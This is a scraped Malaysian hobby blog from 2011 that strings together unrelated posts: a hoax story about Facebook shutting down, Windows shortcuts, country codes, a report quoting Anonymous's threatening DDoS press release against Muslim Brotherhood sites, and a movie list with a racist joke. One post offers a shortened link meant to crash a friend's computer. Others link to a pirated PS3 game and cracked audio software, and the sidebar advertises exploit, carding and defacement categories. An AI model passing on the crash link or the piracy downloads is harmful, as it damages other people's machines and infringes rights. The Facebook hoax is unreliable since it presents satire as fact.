“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”


Some Facebook users were furious upon hearing the shocking news.


“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”


However, parents across the country have been experiencing a long anticipated sense of relief.


“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”


Those in the financial industry are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.


But Zuckerberg remains unruffled by these accusations. He said he will stand by his decision to give Facebook the axe.


“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”


The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th, 2012. After that date, all photos, notes, links, and videos will be permanently erased.

sumber

Sunday, 13 November 2011

Shortcut For Windows

CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)

Tingkatkan signal wifi di rumah anda hanya menggunakan tin kosong

Assalamualaikum.. Hehehe
mesti korang akan gelakkn bila baca entry yang Admin buat kali nie.. kik3.. Admin pn malu sbenar nyer nk upload entry nie.. bye the way, utk sharing ilmu.. Admin upload jgk utuk korang.. harap2 bguna la yer.. x bayak pn ckit pn dah okey kn.?.. hehehe.. korang follow step kat bawah erk..

STEP 1 : mula2 korang cuci la tin tu dlu erk :)
STEP 2 :buang benda nie
STEP 3:
STEP 4:
STEP 5 :
STEP 6 :
STEP 7 :
Selamat Mentry..
hahah jangan korang gelak lak.. harap2 menjadi bagi korang

sumber

ID Codes Setiap Negara

Afghanistan --> AF
Albania --> AL
Algeria --> DZ
American Samoa --> AS
Andorra --> AD
Angola --> AO
Anguilla --> AI
Antarctica --> AQ
Antigua and Barbuda --> AG
Argentina --> AR
Armenia --> AM
Aruba --> AW
Australia --> AU
Austria --> AT
Azerbaijan --> AZ
Bahamas --> BS
Bahrain --> BH
Bangladesh --> BD
Barbados --> BB
Belarus --> BY
Belgium --> BE
Belize --> BZ
Benin --> BJ
Bermuda --> BM
Bhutan --> BT
Bolivia --> BO
Bosnia and Herzegovina --> BA
Botswana --> BW
Bouvet Island --> BV
Brazil --> BR
British Indian Ocean Territory --> IO
Brunei Darussalam --> BN
Bulgaria --> BG
Burkina Faso --> BF
Burundi --> BI
Cambodia --> KH
Cameroon --> CM
Canada --> CA
Cape Verde --> CV
Cayman Islands --> KY
Central African Republic --> CF
Chad --> TD
Chile --> CL
China --> CN
Christmas Island --> CX
Cocos (Keeling) Islands --> CC
Colombia --> CO
Comoros --> KM
Congo --> CG
Congo, Democratic Republic --> CD
Cook Islands --> CK
Costa Rica --> CR
Cote d'Ivoire --> CI
Croatia --> HR
Cyprus --> CY
Czech Republic --> CZ
Denmark --> DK
Djibouti --> DJ
Dominica --> DM
Dominican Republic --> DO
East Timor --> TL
Ecuador --> EC
Egypt --> EG
El Salvador --> SV
Equatorial Guinea --> GQ
Eritrea --> ER
Estonia --> EE
Ethiopia --> ET
Falkland Islands (Malvinas) --> FK
Faroe Islands --> FO
Fiji --> FJ
Finland --> FI
France --> FR
French Guiana --> GF
French Polynesia --> PF
French Southern Territories --> TF
Gabon --> GA
Gambia --> GM
Georgia --> GE
Germany --> DE
Ghana --> GH
Gibraltar --> GI
Greece --> GR
Greenland --> GL
Grenada --> GD
Guadeloupe --> GP
Guam --> GU
Guatemala --> GT
Guinea --> GN
Guinea-Bissau --> GW
Guyana --> GY
Haiti --> HT
Heard and McDonald Islands --> HM
Honduras --> HN
Hong Kong --> HK
Hungary --> HU
Iceland --> IS
India --> IN
Indonesia --> ID
Iraq --> IQ
Ireland --> IE
Israel --> IL
Italy --> IT
Jamaica --> JM
Japan --> JP
Jordan --> JO
Kazakhstan --> KZ
Kenya --> KE
Kiribati --> KI
Kuwait --> KW
Kyrgyzstan --> KG
Lao People's Democratic Republic --> LA
Latvia --> LV
Lebanon --> LB
Lesotho --> LS
Liberia --> LR
Libya --> LY
Liechtenstein --> LI
Lithuania --> LT
Luxembourg --> LU
Macau --> MO
Macedonia --> MK
Madagascar --> MG
Malawi --> MW
Malaysia --> MY
Maldives --> MV
Mali --> ML
Malta --> MT
Marshall Islands --> MH
Martinique --> MQ
Mauritania --> MR
Mauritius --> MU
Mayotte --> YT
Mexico --> MX
Micronesia --> FM
Moldova --> MD
Monaco --> MC
Mongolia --> MN
Montserrat --> MS
Morocco --> MA
Mozambique --> MZ
Namibia --> NA
Nauru --> NR
Nepal --> NP
Netherlands --> NL
Netherlands Antilles --> AN
New Caledonia --> NC
New Zealand --> NZ
Nicaragua --> NI
Niger --> NE
Nigeria --> NG
Niue --> NU
Norfolk Island --> NF
Northern Mariana Islands --> MP
Norway --> NO
Oman --> OM
Pakistan --> PK
Palau --> PW
Palestinian Territory --> PS
Panama --> PA
Papua New Guinea --> PG
Paraguay --> PY
Peru --> PE
Philippines --> PH
Pitcairn --> PN
Poland --> PL
Portugal --> PT
Puerto Rico --> PR
Qatar --> QA
Reunion --> RE
Romania --> RO
Russian Federation --> RU
Rwanda --> RW
Saint Kitts and Nevis --> KN
Saint Lucia --> LC
Saint Vincent and the Grenadines --> VC
Samoa --> WS
San Marino --> SM
Sao Tome and Principe --> ST
Saudi Arabia --> SA
Senegal --> SN
Serbia and Montenegro --> CS
Seychelles --> SC
Sierra Leone --> SL
Singapore --> SG
Slovakia --> SK
Slovenia --> SI
Solomon Islands --> SB
Somalia --> SO
South Africa --> ZA
South Georgia and The South Sandwich Islands --> GS
South Korea --> KR
Spain --> ES
Sri Lanka --> LK
St. Helena --> SH
St. Pierre and Miquelon --> PM
Suriname --> SR
Svalbard and Jan Mayen Islands --> SJ
Swaziland --> SZ
Sweden --> SE
Switzerland --> CH
Taiwan --> TW
Tajikistan --> TJ
Tanzania --> TZ
Thailand --> TH
Togo --> TG
Tokelau --> TK
Tonga --> TO
Trinidad and Tobago --> TT
Tunisia --> TN
Turkey --> TR
Turkmenistan --> TM
Turks and Caicos Islands --> TC
Tuvalu --> TV
Uganda --> UG
Ukraine --> UA
United Arab Emirates --> AE
United Kingdom --> GB
United States --> US
United States Minor Outlying Islands --> UM
Uruguay --> UY
Uzbekistan --> UZ
Vanuatu --> VU
Vatican --> VA
Venezuela --> VE
Viet Nam --> VN
Virgin Islands (British) --> VG
Virgin Islands (U.S.) --> VI
Wallis and Futuna Islands --> WF
Western Sahara --> EH
Yemen --> YE
Zambia --> ZM
Zimbabwe --> ZW

Saturday, 12 November 2011

Operation Brotherhood Shutdown : Multiple Sites taken down by Anonymous Hackers

Operation Brotherhood Shutdown : Multiple Sites taken down by Anonymous Hackers
Anonymous Hackers take down the The Muslim Brotherhood websites. The hacking group had made an announcement Tuesday in which they threatened to launch “Operation Brotherhood Takedown,” on all Brotherhood sites at 8pm on Friday, 11 November.
According to a video released by them on youtube as shown above. They claim to taken down following sites:
As of 2:24 PM EST, ikhwanonline.com IS DOWN.
As of 2:26 PM EST, ikhwanweb.com IS DOWN.

The Brotherhood claimed in a statement released on Saturday morning that the attacks were coming from Germany, France, Slovakia and San Francisco in the US, with 2000-6000 hits per second. The hackers later escalated their attack on the site to 380 thousand hits per second.Under the overload, four of the group’s websites were forced down temporarily.Anonymous is made up of a group of unidentified hackers who have previously attacked Israeli, Russian and NATO sites.

"...Therefore, Anonymous has decided to destroy the Muslim Brotherhood. We shall proceed to dismantle any form of its organization from the internet. Nothing will stop us. We will show no mercy."

Complete Press Release:
Citizens of the World,
We are Anonymous.

Ever since its revolution that shook the world, Egypt has had its fate undecided. Predators who seek to control are waiting to strike at the right moment. They are waiting to take over the country and make it so that another revolution is impossible. We cannot allow this.

The Muslim Brotherhood has become a threat to the revolution Egyptians had fought for, some with their lives. They seek to destroy the sovereignty of the people of Egypt as well as other nations including the United States.

The Muslim Brotherhood started as a benevolent group of people with fair and just intentions. However, as decades went by, corruption seized its mission of good and turned it into a power-hungry organization bent on taking over soverign arab states in its quest to seize power from them. They say this is necessary in order to unify the muslim nations into one islamic state, which is a lie.

We will not allow this to happen.

Their tactics are very similar to tactics used by the Church of Scientology and ideas implemented in Freemasonry. A person may join only when presented in front of the Grand Master, or the Murshid, and is ordered to adhere to a solemn vow, to follow all orders of the Murshid, without hesitation. They claim to be anti-freemasonry, however they follow distinct principles taken from it. If you were to leave the Brotherhood or present any threat to it, they would take it to offense and begin to intimidate you and put your life as well as your loved ones in danger. This has been experienced by many former followers of the Brotherhood, including citizens in the United States and Great Britain who realized they made a terrible mistake. The Muslim Brotherhood is a threat that must be dealt with.

To those listening now, this is not a threat towards the religion of Islam. The Muslim Brotherhood, as well as terrorist organizations affiliating with the religion, defiled and destroyed the very essence of what the religion preaches. Therefore, the Muslim Brotherhood does not represent the true ideas of Islam. In our collective, many of us are Muslim, yet we fight against the corruption in society and the injustice that comes with it.

Infused with its blatant, corrupt ways, the Brotherhood is now a threat to the people.

Therefore, Anonymous has decided to destroy the Muslim Brotherhood. We shall proceed to dismantle any form of its organization from the internet. Nothing will stop us. We will show no mercy.

Operation Brotherhood Takedown, engaged.

We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.
Expect Us.

sumber

Warning!! And Reminder Untuk Pemegang Akaun Pesbuk a.k.a Facebook - Dah 1 Million View


Gempar | Jantung Vampire Di Jual Di Ebay

Assalamualaikum dan salam sejahtera semua...

Sape-sape kat sini nak jadi pontianak ? Muahaha..Kini korang boleh dapatkan jantung pontianak secara online di Ebay..Adoi..Menipu je kan..Tak kan lah ada benda macam ni kot..Adoi..Jantung Vampire ini dikatakan dibunuh pada 7 April 1912, kini dijual di Ebay.
kezamx: korang rse betul ke ni jantung vampire ? Hehe..Pe pendapat korang ?

Sunday, 6 November 2011

My 10 Favorite Gangsta Movies

published September 10, 2009

That's right "Gangsta" not "Gangster." We're not talking about the Italian mafia flicks, we're talking about the hard knock life of the inner city, something I am exceptionally familiar with. Gangs, guns, violence, illegitimate pregnancies, 40 oz, murder, homeys, and a whole lot of tragedy is what you get from these movies. Here are my 10 favorite movies from da hood. I recommend having some MC Eiht playing in the background.
#10 - Gang Related - Tupac Shakur may have made his big bucks with his music, but he definitely had some decent acting talent. This being his last film, Tupac played a bad cop fantastically. It's too bad Tupac got his cap pilled.
#9 - New Jack City - This movie is essentially about the rise of crack and has a damn good preformance by Blade. This movie also fills my daily allowance for drug use, tragedy, and murder in a movie. Also look for a young Chris Rock has a large part as a recovering crackhead. Also look for Eek-aa-mouse, and a couple cameo's by Flava Flav.
#8 - Juice - Already Tupac makes to the list a second time in this tragic movie where a group of 4 friends are torn apart by Tupac's ambition to get some "Juice." A great hood movie with cameos from Samuel Jackson and Queen Latifah. I definitely like-ah da Juice!
#7 - Belly - This flick doesn't get the recognition it deserves. It's a highly stylized gangsta flick directed by Hype Williams. This movie also features quite possibly the most bad ass Jamaican drug dealer of all time. It's a good thing they didn't go with the original title of "Pregnant Belly."
#6 - Dead Presidents - From the makers of Menace II Society comes another great iconic movie that takes place before, during, and after the Vietnam war. It's takes a good look at what war can do to people and the desperation that ensues. It's too bad more brutha's didn't wear white face while committed crimes, to shift the blame where it belongs. On whitey.
#5 - Colors - This is one of the first movies to bring attention to the Bloods vs. Crips violence. The interesting thing is that they used actualy gang members in the film, including two guys that were shot and killed during production. I consider this the pioneer of the gangsta movie, even though it focuses on two white cops.
#4 - Friday - This is the only comedy to make it on the list, and it shows a lot can go down between Thursday and Saturday. I went in expecting a Tyler Perryesque crappy dud, but was surprisingly entertained. This movie is actually kinda funny, especially if you can relate to their situation like I can.
#3 - Boyz in the Hood - This is the launchpad to the supposed promising career of Cuba Gooding Jr. With help from an excellent supporting cast of Ice Cube and Morpheus, we get a damn good hood movie. The only reason this movie isn't higher is that Tre is kind of a pussy.
#2 - Training Day - This will go down as the most bad ass Denzel Washington has ever been. Hidden behind his excellent preformance is an intriguing subplot about his grip on his neighborhood and how he finally gets his. Often times, after defeating an opponent I will still declare that King Kong indeed does not have any excrement on me.
#1 - Menace II Society - This movie transcends the best gangsta movie and moves into one of the best movies ever category. Everyone in the movie is a bad ass, except maybe Shareef. Tupac was originally slated to play the #1 badass O-Dogg, but he punched out one of the directors and Larenz Tate took his place and did a fine job. Tragic and hilarious, that's how all movies should be!


* * * * *

sumber

Assassin's Creed Brotherhood

Disk ID: BLES00909
Region: EUR
Works on: Internal/External (\...\BLES00909\PS3_GAME\USRDIR\ASSASSIN_ISO <--- make an empty

folder)
Game + Copernico DLC and guide included (folder)
Código:
http://www.filesonic.com/folder/6417201
mirror
http://www.fileserve.com/list/n6AqWpN
mirror
http://www.wupload.com/folder/32570
mirror
http://www.uploadstation.com/list/PYPAKpn
-- or --
Código:
http://www.fileserve.com/list/JsH7RvH
mirror
http://www.filesonic.com/folder/983811

Thursday, 3 November 2011

Crash A PC Through Url

Well i had got a link which you can use to crash your Friend's Computer just by opening that link.

Don't open this link on your own computer.

Notice : This link was tested on a RDP and it works perfect.

http://tiny.cc/ibJUN

Tuesday, 1 November 2011

SRS Audio Sandbox 1.10.1.0 + Crack

Assalamualaikum.. Bagi peminat-peminat musik yang tidak akan tenang kalau tidak mendengar lagu sebelum tidur dan selepas bangun tidur macam aku.. Di sini aku ingin berkongsi satu benda yang amat menarik untuk menyedapkan lagi muzik yang kita dengar iaitu SRS Audio Sandbox! Salah satu enhancer yang sangat sesuai dan terbaik bagi aku untuk window Xp dan Vista..

Ianya amat mudah untuk digunakan dan sememangnya aku amat berpuas hati dengan software ini.. Jom kita tengok sikit...
Penampilan yang kemas dan ringkas namun mendatangkan kesan yang amat efektif.. Chewah ayat.. Hehehemohemo..
Didatangi dengan panduan yang tersedia dengan hanya menekan F1

Diujikaji dan berjaya dengan OS : XP dan Vista

Ingin mencuba hanya muat turun ------>disini

Updates Via E-Mail

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST